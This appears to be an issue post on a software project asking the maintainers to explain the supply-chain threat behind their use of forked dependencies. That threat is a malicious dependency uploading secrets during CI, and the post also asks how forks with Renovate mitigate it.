Describe how the supply-chain attack could work

In your process document, you describe the reason why you use forks:

We are using forks of projects in order to avoid security issues where a malicious dependency could upload secrets during our CI pipelines.

This is supposed to mimic community contributions and reviewers / maintainers should proceed with similar caution to these updates in order to prevent supply chain attacks.

I'm trying to understand what the attack is that you are describing here, but its a bit unclear. Could you provide a bit more detail about what the potential attack is here, perhaps with an example? It would also be useful to describe how exactly the fork method you are using to bypass this actually does bypass the potential attack and what it is about renovate and forks that cannot be done with upstream's renovate.